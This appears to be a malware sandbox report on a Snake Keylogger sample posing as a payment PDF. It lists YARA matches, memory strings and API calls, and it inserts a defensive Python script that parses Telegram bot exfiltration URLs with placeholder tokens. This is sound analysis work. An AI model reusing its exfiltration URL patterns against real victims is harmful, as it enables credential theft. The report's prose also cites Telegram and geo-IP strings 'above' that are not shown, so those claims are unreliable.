                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DF4000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003FE0000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3C000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.00000000040B5000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DF4000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4113385147.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F06000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4109031767.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                Source: unknown; Network traffic detected: HTTP traffic on port 443 to and from local ports 49735, 49737, 49740, 49742, 49744, 49746, 49748, 49750, 49753, 49755 and 49760 (every connection was observed in both directions, 443 -> local port and local port -> 443)
                Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2 (149.154.167.220 lies in Telegram's 149.154.160.0/20 range, consistent with the api.telegram.org strings above)

                System Summary

                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hooking Author: ditekSHen
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hooking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hooking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hooking Author: ditekSHen
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hooking Author: ditekSHen
                Source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sample; Static PE information: Filename: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe; Code function (process 0): 0_2_02AAEFE4
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe; Code functions (process 0, 0x0763xxxx region): 0_2_07637E40, 0_2_076356D0, 0_2_0763EB68, 0_2_0763D1F0, 0_2_07637800, 0_2_076368E2, 0_2_07636760, 0_2_0763775F, 0_2_07637727, 0_2_076347EA, 0_2_076377C7, 0_2_076377DB, 0_2_07635EE0, 0_2_076376FF, 0_2_07639EC5, 0_2_07639EC8, 0_2_0763D6C8, 0_2_0763D6D8, 0_2_076356B0, 0_2_07639698, 0_2_0763D478, 0_2_0763E478, 0_2_07639C28, 0_2_07639C38, 0_2_0763D488, 0_2_0763E488, 0_2_0763EB66, 0_2_07639AC8, 0_2_07639AB8, 0_2_0763D920, 0_2_0763D930, 0_2_0763D1B3, 0_2_07638849, 0_2_07638858, 0_2_0763F028, 0_2_0763F038, 0_2_0763A089
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe; Code functions (process 0, 0x0788xxxx region): 0_2_0788C0C8, 0_2_07888717, 0_2_07888728, 0_2_07886680, 0_2_07886248, 0_2_07885E10, 0_2_07887D28, 0_2_07883821
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe; Code functions (process 2, 0x010Cxxxx region): 2_2_010CC146, 2_2_010C5370, 2_2_010CD278, 2_2_010CC468, 2_2_010CC738, 2_2_010CE988, 2_2_010C69A0, 2_2_010CCA08, 2_2_010C9DE0, 2_2_010CCCD8, 2_2_010CCFAA, 2_2_010C6FC8, 2_2_010C3E09, 2_2_010CF961, 2_2_010CE97A, 2_2_010C29EC, 2_2_010C3AB1
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe; Code functions (process 2, 0x069Axxxx region): 2_2_069A1FA8, 2_2_069A9448, 2_2_069A9D38, 2_2_069A2A90, 2_2_069A1850, 2_2_069A5148, 2_2_069AD670, 2_2_069A9668, 2_2_069AD660, 2_2_069A1F9C, 2_2_069AE7D0, 2_2_069AE7C0, 2_2_069ADF1E, 2_2_069ADF20, 2_2_069AF4D8, 2_2_069A8CC0, 2_2_069AEC18, 2_2_069AEC28, 2_2_069ACDC0, 2_2_069ADAB9, 2_2_069ADAC8, 2_2_069AD218, 2_2_069AD209, 2_2_069A0B30, 2_2_069A0B20, 2_2_069AE378, 2_2_069AE36A, 2_2_069AF080, 2_2_069A0006, 2_2_069A0040, 2_2_069A1841, 2_2_069AF071, 2_2_069A5138, 2_2_069AF930, 2_2_069AF922
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1679052226.0000000008AF0000.00000004.08000000.00040000.00000000.sdmp; Binary or memory string: OriginalFilenameMontero.dll8 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1669150995.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameclr.dllT vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000002.1673192115.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000000.00000000.1646539842.00000000009A2000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: OriginalFilenameYuCz.exeB vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4104888758.0000000000446000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4105094892.0000000000D77000.00000004.00000010.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Swift Copy TT USDUSD$23,401.PDF.exe; Binary or memory string: OriginalFilenameYuCz.exeB vs Swift Copy TT USDUSD$23,401.PDF.exe
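The "String found in binary or memory" list above (Telegram bot API URLs, the reallyfreegeoip.org lookup, the font-vendor and Microsoft help links) and the OriginalFilename mismatches just listed are the parts of a report like this that a responder actually extracts. The Python below is an added triage example written for this page; it is not Joe Sandbox code and not part of the report. Its input is a constructed subset of the report's strings, the bot token and chat_id in it are placeholders in Telegram's format rather than the values the sandbox recorded (8.46.123.189 is the lookup target the report shows), and the noise-domain allowlist and the lure/executable extension lists are assumptions.

```python
"""Triage of Joe Sandbox "String found in binary or memory" values (added example).

Separates the exfiltration channel (Telegram bot API), the external IP lookup
(reallyfreegeoip.org) and the double-extension lure from the font-vendor and
Microsoft URLs that .NET binaries carry as library residue, and lists the
OriginalFilename values that disagree with the name on disk.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed input modelled on the report's string list. Token and chat_id are
# placeholders in the real format, NOT the values observed in the sample.
PLACEHOLDER_TOKEN = "1234567890:" + "A" * 35   # Telegram tokens are <bot id>:<35 chars>
PLACEHOLDER_CHAT = "7128000000"
SAMPLE_STRINGS = [
    "http://www.fontbureau.com/designers/frere-user.html",
    "http://www.typography.netD",                               # trailing junk byte, as in the report
    "https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17",
    "https://api.telegram.org",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",  # template; token filled in at runtime
    f"https://api.telegram.org/bot{PLACEHOLDER_TOKEN}/sendDocument?chat_id={PLACEHOLDER_CHAT}",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.189",
    "https://reallyfreegeoip.org/xml/8.46.123.189$",
    "OriginalFilenameRemington.exe4 vs Swift Copy TT USDUSD$23,401.PDF.exe",
    "OriginalFilenameclr.dllT vs Swift Copy TT USDUSD$23,401.PDF.exe",
]

TELEGRAM_RE = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{35})"
    r"/(?P<method>[A-Za-z]+)(?:\?(?P<query>\S*))?")
TEMPLATE_RE = re.compile(r"api\.telegram\.org/bot/(?P<method>[A-Za-z]+)")
GEOIP_RE = re.compile(r"reallyfreegeoip\.org/xml/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")
ORIGNAME_RE = re.compile(r"OriginalFilename(?P<name>\S+?\.(?:exe|dll))", re.IGNORECASE)

# Assumed allowlist of hosts found in most .NET/GDI+ binaries (font licence metadata,
# Office/Chrome help links). Prefix match on purpose: memory strings often carry
# trailing junk ("typography.netD"), so an end anchor would miss them.
NOISE_DOMAINS = [
    "fontbureau.com", "fonts.com", "founder.com.cn", "galapagosdesign.com",
    "goodfont.co.kr", "jiyu-kobo.co.jp", "sajatypeworks.com", "sakkal.com",
    "sandoll.co.kr", "tiro.com", "typography.net", "urwpp.de", "zhongyicts.com.cn",
    "support.office.com", "office.com", "chrome.google.com",
]
NOISE_HOST_RE = re.compile(
    r"^(?:[a-z0-9-]+\.)*(?:" + "|".join(re.escape(d) for d in NOISE_DOMAINS) + ")")

LURE_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}   # assumed
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}     # assumed


def has_double_extension(filename):
    """True for lure names like 'x.PDF.exe': a document extension in front of an executable one."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and "." + parts[1] in LURE_EXTS and "." + parts[2] in EXEC_EXTS


def classify(value):
    """Bucket one string by host: telegram, geoip, library_noise or other."""
    host = urlsplit(value).hostname or ""
    if host == "api.telegram.org":
        return "telegram"
    if host == "reallyfreegeoip.org":
        return "geoip"
    if NOISE_HOST_RE.match(host):
        return "library_noise"
    return "other"


def extract_telegram_c2(strings):
    """Bot id -> token, API methods and chat_ids recovered from fully formed bot URLs."""
    bots = {}
    for s in strings:
        m = TELEGRAM_RE.search(s)
        if not m:
            continue
        bot = bots.setdefault(m["bot_id"], {"token": m["token"], "methods": set(), "chat_ids": set()})
        bot["methods"].add(m["method"])
        bot["chat_ids"].update(parse_qs(m["query"] or "").get("chat_id", []))
    return bots


def triage(strings, filename):
    """Summary a responder can act on: report the bot token, block the lookup host, and so on."""
    buckets = {k: [] for k in ("telegram", "geoip", "library_noise", "other")}
    for s in strings:
        buckets[classify(s)].append(s)
    geoip_ips = []
    for s in buckets["geoip"]:
        m = GEOIP_RE.search(s)
        if m and m["ip"] not in geoip_ips:
            geoip_ips.append(m["ip"])
    orig_names = {m["name"] for s in strings for m in [ORIGNAME_RE.search(s)] if m}
    return {
        "double_extension": has_double_extension(filename),
        "telegram_bots": extract_telegram_c2(buckets["telegram"]),
        "template_methods": {m["method"] for s in buckets["telegram"] for m in [TEMPLATE_RE.search(s)] if m},
        "geoip_lookups": geoip_ips,
        # clr.dll is expected in any .NET process; the payload names (Remington.exe) are the finding
        "originalfilename_mismatch": sorted(n for n in orig_names if n.lower() != filename.lower()),
        "library_noise": len(buckets["library_noise"]),
        "other": buckets["other"],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_STRINGS, "Swift Copy TT USDUSD$23,401.PDF.exe"), default=sorted, indent=2))
```

The token is kept in full rather than redacted because the actionable step is to report it to Telegram and to search other samples for the same bot id; the template URL (bot/sendMessage with an empty chat_id) is reported separately, since it shows which API calls the binary can make even when only one of them was observed with the token filled in.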
                Source: Swift Copy TT USDUSD$23,401.PDF.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.Swift Copy TT USDUSD$23,401.PDF.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4104888758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1674455094.00000000044D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Swift Copy TT USDUSD$23,401.PDF.exe PID: 5804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, --C.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, --C.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4817a88.1.raw.unpack, ----.csBase64 encoded string: 'KjlXwXHz67L4/KTtyJSSs4dh5aVfF5nOygiszyttgV0XZccffFNqgU5c02Mta8vw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift Copy TT USDUSD$23,401.PDF.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMutant created: NULL
